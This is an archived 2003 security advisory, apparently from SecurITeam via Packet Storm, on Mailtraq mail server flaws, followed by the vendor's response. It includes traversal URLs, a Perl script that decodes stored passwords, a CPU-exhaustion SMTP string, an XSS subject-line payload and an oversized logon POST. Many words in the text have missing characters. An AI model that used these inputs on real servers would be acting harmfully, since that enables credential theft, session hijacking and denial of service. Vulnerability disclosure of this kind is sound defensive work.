exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

5HP0G1FAAC.txt

5HP0G1FAAC.txt
Posted Jun 17, 2003
Site SecurITeam.com

The product Mailtraq suffers from multiple vulnerabilities that range from access to files that reside outside the bounding HTML root directory through decryption of locally stored password, to a cross site scripting vulnerability in the web mail interface.

tags | exploit, web, root, vulnerability, xss
SHA-256 | 0fccaf9934ee9baa9e271e3755695428f4343300ad90ccad092c5010d7861a0e

5HP0G1FAAC.txt

Change Mirror Download
    Title                                                       9/6/2003
Multiple Vulnerabilities Found in Mailtraq (DoS, Password Decryption,
Directory Traversal)
Summary
Mailtraq is a "comprehensive e-mail SMTP/POP3 and proxy server, with a
powerful mailing list server". The product suffered from multiple
vulnerabilities that range from access to files that reside outside
the bounding HTML root directory (through dying access to the server
by causing the server to utilize a high CPU percentage) through
decryption of locally stored password,to a cross site scripting
vulnerability in the web mail interface.
Details
Vulnerable version:
* Mailtraq version 2.1.0.1302
Immune version:
* Mailtraq version 2.3.2.1419
HTTP Server directory traversal
By accessing a URL as simple as:
http://127.0.0.1/win2k/
Or,
http://127.0.0.1/Program%20Files/
It is possible to access directories that would be otherwise
inaccessible. Some of the directories contain sensiti information, but
what is more interesting in this problem is the fact that the Mailtraq
product keeps the password encrypted i rivial form, which can be
easily decrypted using the following perl script:
#!/usr/bin/perl
$Password = $ARGV[0];
print "Passwords should be something like: \\3D66656463626160\n";
print "Provided password: $Password\n";
$Password = substr($Password, 3);
$Length = length($Password)/2;
print "Length: $Length\n";
for ($i = 0; $i < $Length; $i++)
{
print "Decoding: ", substr($Password, $i*2, 2), " = ";
$ord = hex(substr($Password, $i*2, 2));
print $ord^$Length, " (", chr($ord^$Length), ")\n";
}
Note that it is possible to "decrypt" any password that is stored
under the C:\Program Files\Mailtraq\database\conuration directory or
under the users directory, both of which are accessible via the
directory traversal vulnerability.
SMTP MAIL FROM, RCPT TO, HELO, FROM 100% CPU consumption (when viewing
Event Log)
By sending a repeated a string such as @@%s%p%n, or without the @@
along with any of the SMTP commands, MAIL FROM,PT TO, HELO, email's
FROM head field, will cause server's CPU usage to spike between 1
second to 5 seconds. Sending a simple ovrlow doesn't have the same
effect. The number of repeated %s%p%n required in order to cause the
DoS, is 65535 and above ("%s%p%"x5535 - perl style).
Cross Site Scripting in WebMail
Sending a specially crafted email to a user can be used to steal his
current session allowing an attacker to log oas the user. Sending such
an email to the postmaster user will usually allow stealing of the
administrator session. The vulneraiity occurs because the product does
not correctly filter HTML/JavaScript code from the subject field when
it is viewed in the is (the email viewing itself is not vulnerable).
Example:
Sending an email with the following subject should illustrate the
issue:
< script>alert(document.location)</script>
Logon CGI vulnerable to 100% CPU consumption
By sending an overly long username and password (any of them, or both)
the CPU usage by the product will spike to %, the amount of time it
spikes depends on the size of the buffer being sent (100,000
characters cause about 3-4 seconds stall) description48=
POST /$/menu HTTP/1.1
Host:
User-Agent: Mozilla/1.0(compatible;)
Pragma: no-cache
Content-Length: ...depending on size...
Connection: close
Content-Type: application/x-www-form-urlencoded
user=<More than 100,000 A>&password=<More than 100,000 A>
Solution:
We recommend that all users upgrade to the most recent build of
Mailtraq to ensure that they are up to date with t latest
developments.
The latest build of Mailtraq Version 2.3.2.1419 includes the patches
addressing these issues which are detailed abe.
Mailtraq Version 2.3.2.1419 is immediately available for download as a
public beta release pending complete QA tesng, and then will be
upgraded to full release status.
Vendor response:
HTTP Server directory traversal
Mailtraq is not vulnerable to this problem if it is installed with the
default configuration on a standard "box". u can only access paths
exposed by the web server.
Password Encryption
With respect to password encoding: weak password encryption was chosen
as the objective is simply to obscure the iormation from the casual
reader.
It is worth noting that by default .cfg files are excluded in the new
Web Server.
SMTP MAIL FROM, RCPT TO, HELO, FROM 100% CPU consumption (when viewing
Event Log)
We have investigated this issue and added constraints to the SMTP
server.
Logon CGI vulnerable to 100% CPU consumption
These "vulnerabilities" only appear to exist when using the Event Log
Viewer diagnostic-tool, not when Mailtraq isunning in its normal
configuration. However we have addressed the potential for high CPU
consumption by capping the size form ecded POST data.
Under normal running conditions the neither the Mailtraq Console or
the event log viewer are open, so the "vulnerality" relies upon
specific administrator activity.
Cross Site Scripting in WebMail
The example that you gave referred to the old and deprecated WebMail
service. We recognise that this is a potentiay significant issue and
are grateful for your bringing it to our attention. It has been
addressed in build 1419 which was releae earlier today.
Mailtraq has replaced the entire WebMail system with a new one since
the tested build. The new WebMail system was t susceptible to the
problem you described, but CSS could be invoked in another manner.
This has now been addressed.
It is important to note that the AUTHKEY cookie (allowing
re-authentication after session expiry) is keyed to the ient IP
address. As of today's build, the same applies to the SESSIONKEY.
Thus, even if a new CSS vulnerability were to arise, ouseful
information could be extracted from the browser.
The browse.asp* vulnerability which allows the attacker to determine
the path of the installed web site has been aressed by limiting this
debug information to the LAN specification.
We again thank you for bringing these items to our attention, and
would be pleased to hear from you to discuss theatter further.
Best wishes,
David Rose
Additional information
The information has been provided by Noam Rathaus of SecurITeam.

&"nbsp;"

Copyright © 1998-2003 Beyond Security Ltd. All rights reserved.
Terms of Use Site Privacy Statement.
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close